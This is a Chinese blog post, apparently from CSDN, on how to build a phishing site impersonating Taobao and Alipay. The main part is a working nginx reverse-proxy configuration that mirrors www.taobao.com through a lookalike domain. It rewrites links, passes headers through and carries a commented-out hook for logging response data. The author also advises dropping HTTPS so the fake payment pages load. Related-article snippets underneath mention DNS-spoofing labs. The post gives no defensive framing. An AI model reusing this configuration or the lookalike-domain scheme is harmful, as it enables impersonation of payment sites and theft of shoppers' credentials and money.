关于钓鱼网站的实现原理与技术

最新推荐文章于 2024-02-22 12:00:00 发布
原创 最新推荐文章于 2024-02-22 12:00:00 发布 · 1w 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#nginx 钓鱼

本文介绍了钓鱼网站的一种实现方法,主要利用域名蒙眼术和DNS支持。通过设置Nginx作为反向代理,将用户请求转发到目标站点,同时进行URL和静态资源的替换,以达到伪装的目的。详细步骤包括配置Nginx服务器块,进行URL和头信息的伪装,以及静态文件的缓存处理。

最近闲的蛋疼~ 分析了一下钓鱼网站的原理与实现。

可选技术方案

1)域名蒙眼术;

2)dns支持;

dns劫持的关键是拥有客户端操作系统的权限,比如给用户发一些病毒程序,安装浏览器插件这类来实现,这里主要讨论web技术。


蒙眼术,比如:www.taobao.com是淘宝的域名,那我可以申请买个域名:www.taobao.com.xx.cn(注意红色才是真正的域名),普通用户不注意的话,是不会注意到域名上的区别了~

对于交易网站通常都是https开头的,这个证书是很难伪造的,当然能够入侵客户的操作系统也是可以搞定的,这个不谈。怎么办?我们不使用https就行了呗。还是上面说的,比如

https://pay.alipay.com,我们可以使用http://pay.alipay.com.xx.cn,用户发现了,那就认了~~


接下来,就是重点,后端的http服务如何提供,熟悉nginx 反向代理之类软件的人敢说so easy~

发现一个类似的网站,可以参考这个网站:http://www.cncache.info

好了,上代码。简单的实现其实没这么复杂,这里还加入了静态文件缓存,网页中的域名替换。



#cache begin 用于静态资源缓存
proxy_buffering on;
proxy_cache_valid 200 204 1h; #default valid period
proxy_cache_path /work/cache levels=1:2 keys_zone=my-cache:8m max_size=5000m inactive=600m;
proxy_temp_path /work/temp;
proxy_buffer_size 4k;
proxy_buffers 100 8k;
#cache end


server {
        listen       80;
        server_name  www.taobao.com.xxx.com;
set $ori_server "www.taobao.com";
set $resp_body "";
set $req_dir "/";

#url替换
sub_filter $ori_server  $host; #subs_filter not support variables
sub_filter_once off;
subs_filter_types text/html;

#图片链使用原站的
subs_filter ((href|src|background)=['"])((?!http:)(?!https:)[^/]([./?%&=\w-]+)\.(gif|jpeg|jpg|png|js|css)([?][./?%&=\w-]+)?['"]) $1http://$ori_server$req_dir/$3 ir;
subs_filter ((href|src|background)=['"])((/[./?%&=\w-]+)\.(gif|jpeg|jpg|png|js|css)([?][./?%&=\w-]+)?['"]) $1http://$ori_server$3 ir;

#头信息伪装
proxy_set_header Accept-Encoding ""; #gzip not support
proxy_set_header X-Forward-For $remote_addr; #transfer client ip to dest server
proxy_pass_header Server; #transfer ori header[Server] to browser
proxy_cache my-cache;

#首页
location  ~* ^/(index.htm|index.html)?$ { # //index.htm /index.html
proxy_pass  http://$ori_server;      
}

location  ~* \.(js|css)$ {
proxy_pass  http://$ori_server;
#TODO replace url
}

location  ~* (favicon.ico|\.(gif|jpeg|jpg|png))$ {
proxy_pass  http://$ori_server;
}

        location /{
if ( $request_uri ~* "(.*)?/[^/]*$" ){
set $req_dir $1;
}
proxy_pass  http://$ori_server;


#log data
#if ($request_uri ~* "(/getDepartments.do)"){
#body_filter_by_lua 'ngx.var.resp_body =ngx.var.resp_body..ngx.arg[1];';
#}
        }


        #error_page  404              /404.html;
        # redirect server error pages to the static page /50x.html
        #
        error_page   500 502 503 504  /50x.html;
        location = /50x.html {
            root   html;
        }


        
}

mr___zhu
关注
Web安全:钓鱼网站、广告植入之攻原理
weixin_54787877的博客
03-15 756
Web安全之XSS攻防 1. XSS的定义 跨站脚本攻击(Cross Site Scripting),缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 2. XSS的原理 攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。 诱使受害者打开受到攻击的服务器URL。 受害者在Web浏览器中打开URL,恶意脚本执行。 3. XSS的攻击方式 (1)反射型: 发出请求时,XSS代码出现
钓鱼网站原理攻防
goldfish8848的博客
06-28 996
知识点:LAMP平台部署,Web架构分析,钓鱼网站原理搭建。
钓鱼网站原理简介
热门推荐
be_easy的博客
03-18 1万+
如何建立一个简单的钓鱼网站 环境搭建: phpstudy: Navicat Premium Sublime 1.点击打开PHPstudy,开启Apache和MySQL Apache是一款web服务器端软件,充当代理服务器网站进行通信; MySQL是当下流行的一款关系数据库管理系统,我们用它来创建数据库。 2.创建接收用户的数据库 打开Navicat Premium,点击链接,选择链接MySQL...
网络钓鱼原理分析
顾传龙
04-20 4533
本文转自:http://horseb.i.sohu.com/blog/view/179701443.htm   网络钓鱼形势分析   IE7浏览器开始加入反钓鱼功能,这个功能成为浏览器安全功能的一个选项 - 仿冒网站筛选器。各类IM软件,如QQ等开始出现提示用户防止被网络钓鱼的安全信息。电子商务、门户、SNS、BLOG等大部分Web2.0热门网站,也 开始公告用户防止被网络钓鱼的安全信息。
浅析钓鱼网站原理及模拟搭建
weixin_44801963的博客
09-11 6561
文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 总所周知,web是互联网中分布全球的应用服务,可以更便捷地传输信息。此同时,互联网中也出现了许多虚假的web网站,用于非法获取互联网用户信息,钓鱼网站就是其中一种。本文通过复现钓鱼网站的搭建过程,旨在让更多网友认识到钓鱼网站原理及其危险性,提高保护个人的信息安全意识。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任
网络钓鱼原理和防范
IT技术
06-30 275
原理和防范 获取敏感数据:用户名,口令,账号ID 防范方法: 申请并安装数字证书 规范使用操作: 做到三及时一避免 不在不安全的地点进行交易 不盲目接受英文邮件 认真查短信来源 地要求重新输入账号信息要进行电话验证 访问网站一定使用浏览器访问 ...
基于Unity3d的模拟钓鱼游戏设计实现.doc
09-09
本文主要介绍了基于Unity3d的模拟钓鱼游戏的设计实现,包括游戏设计原理、游戏设计、游戏实现、游戏测试等。通过本项目,我们掌握了Unity3d游戏开发引擎的使用方法,掌握了C#脚本的编写方法,掌握了游戏设计和实现...
钓鱼网站钓鱼技术剖析(圆桌会议)
GitChat
04-12 2048
在昨天,一个 DNF 的钓鱼页面引起了我的注意,按照常理来说,腾讯游戏的钓鱼链接发送到 QQ 中,不到一分钟便会被拦截提示危险。而对方 URL 腾讯并不做拦截,于是我和朋友分析了其原理,通过多次实验现已经能够成功绕过 QQ 检测实施钓鱼攻击。本场 Chat 我将站在攻击者的角度来复现环境: 如何绕过 QQ 检测 基于 Adaboss 算法的反钓鱼模型(URL,特征匹配) 现今黑产钓鱼网站常见反检...
三国杀钓鱼脚本实现原理
04-29
嗯,用户现在想了解用Java实现三国杀钓鱼脚本的工作原理。之前我已经给过一个框架和注意事项,但需要更深入解释原理。首先,用户可能对自动化脚本如何运作不太清楚,需要分步骤讲解。 首先,用户提到了“钓鱼脚本”...
Kali 钓鱼网站长期保存信息的实现方式和原理
最新发布
05-28
### Kali Linux中实现钓鱼网站原理方法 在Kali Linux中,实现钓鱼网站并长期保存信息的过程涉及多个工具和步骤。以下是具体的技术原理实现方式: #### 1. 钓鱼网站的基本原理 钓鱼网站的核心是通过伪装成...
分析网络钓鱼原理及防御措施
siegebaoniu的专栏
01-04 5646
<br />IE7浏览器开始加入反钓鱼功能,这个功能成为浏览器安全功能的一个选项 – 仿冒网站筛选器。各类IM软件,如QQ等开始出现提示用户防止被网络钓鱼的安全信息。电子商务、门户、SNS、BLOG等大部分Web2.0热门网站,也开始公告用户防止被网络钓鱼的安全信息。<br />    在传统的利用系统漏洞和软件漏洞进行入侵攻击的可能性越来越小的前提下,网络钓鱼已经逐渐成为黑客们趋之若鹜的攻击手段。同时无论网络相关的客户端软件还是大型的Web网站都开始发觉网络钓鱼已经成为了一个严峻的问题,并积极防御。<br
什么是网络钓鱼?底层原理是什么?
长风破浪会有时的博客
08-01 316
攻击者通常会伪装成一个值得信任的实体,并通过电子邮件、短信或社交媒体等方式发送欺骗性信息,诱使受害者点击链接、下载附件或输入个人信息。网络钓鱼是一种欺诈行为,旨在通过欺骗方式获取用户的敏感信息,如登录凭据、信用卡信息、社交安全号码等。该攻击通常通过电子邮件、即时消息或社交媒体等方式进行,而信息通常被伪装成来自可信源的,例如银行、电子商务网站或政府机构。为了防止网络钓鱼攻击,用户应该时刻保持警惕,不要相信来自未知来源的信息,避免点击怀疑链接或下载附件。
钓鱼网站检测技术的演进
u013750302的博客
11-24 2115
钓鱼网站检测技术的演进
中级DNS劫持,做钓鱼网站
haha1314的博客
05-14 890
环境: 配置一个目标网站www.wf.com 设置dns解析www.wf.com 网卡:192.168.88.2 Win7 被欺骗的 ip:192.168.88.143 Win server 2008 DNS服务器 ip:192.168.88.136 选择自己所在的网卡 代码如下: from scapy.all import * dnss="192.168.88.136" xwl...
搭建网站实现DNS欺骗
可惜已不在
02-22 2602
随着信息技术的飞速发展,网络搭建和服务器搭建已成为现代社会的基石。它们如同数字世界的骨架,支撑着各类应用的运行,让信息的传递和共享变得前所未有的便捷。然而,这仅仅是开始,对于真正渴望在信息技术领域探索的人们来说,学习的道路上仍有无数高峰等待我们去攀登。此刻,我们正站在一个崭新的起点,带着对知识和技术的渴望,开启一段全新的学习篇章。在这个篇章中,我们将不满足于仅仅搭建起稳固的网络和服务器,更将深入网络攻击.学习新篇章的道路或许充满挑战,但正是这些挑战,将激发我们不断前行的动力。
网络钓鱼技术
深耕安全技术研究
08-31 1847
对网络钓鱼技术的解析
DNS劫持实验(钓鱼网站)
n5xxxx__zy的博客
05-31 2847
实验环境: 搭建一个目标网站www.wh.com 网卡:192.168.146.2 Win7 (被欺骗的)IP:192.168.146.129 Win2008 (假DNS服务器)IP:192.168.146.130 1、网站搭建 Win2008网卡 2、执行py代码 from scapy.all import * wlan2="VMware Virtua...
局域网下利用dns欺骗进行钓鱼
m0_64342167的博客
02-08 3073
实验材料 kali rtl8812au 靶机一台(手机电脑皆可) 前置工作 1、首先开启流量流量转发,不然开启arp欺骗就是单纯的断网了 2、接下来再去添加你要重定向的dns,该配置文件是/etc/ettercap/etter.dns 3、最后开启一个http服务,部署你的钓鱼网站 前置工作完成后,接下来一把子梭就完事了,打开ettercap 注意这里的网卡别选错了,使用虚拟机自带的网卡转发速度非常慢,要选择无线网卡 接下来扫描添加target,当然是我们的靶机和网关啦 接.
第五天 01-搭建部署钓鱼网站
qq_56414082的博客
01-02 620
DNS:Domain Name Service 域名服务相关DOS命令nslookup 网址 //解析网址相关信息钓鱼网站的定义– 网络钓鱼是一种网络欺诈行为,指不法分子利用各种手段,仿冒真实网站的地址以及页面内容,以此来骗取用户银行或信用卡帐号、密码等私人资料DNS欺骗的定义– 攻击者冒充域名服务器的一种欺骗行为。冒充域名服务器,后把查询的IP地址设为攻击者的IP地址,用户上网只能看到攻击者的主页,而不是想要访问主页。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值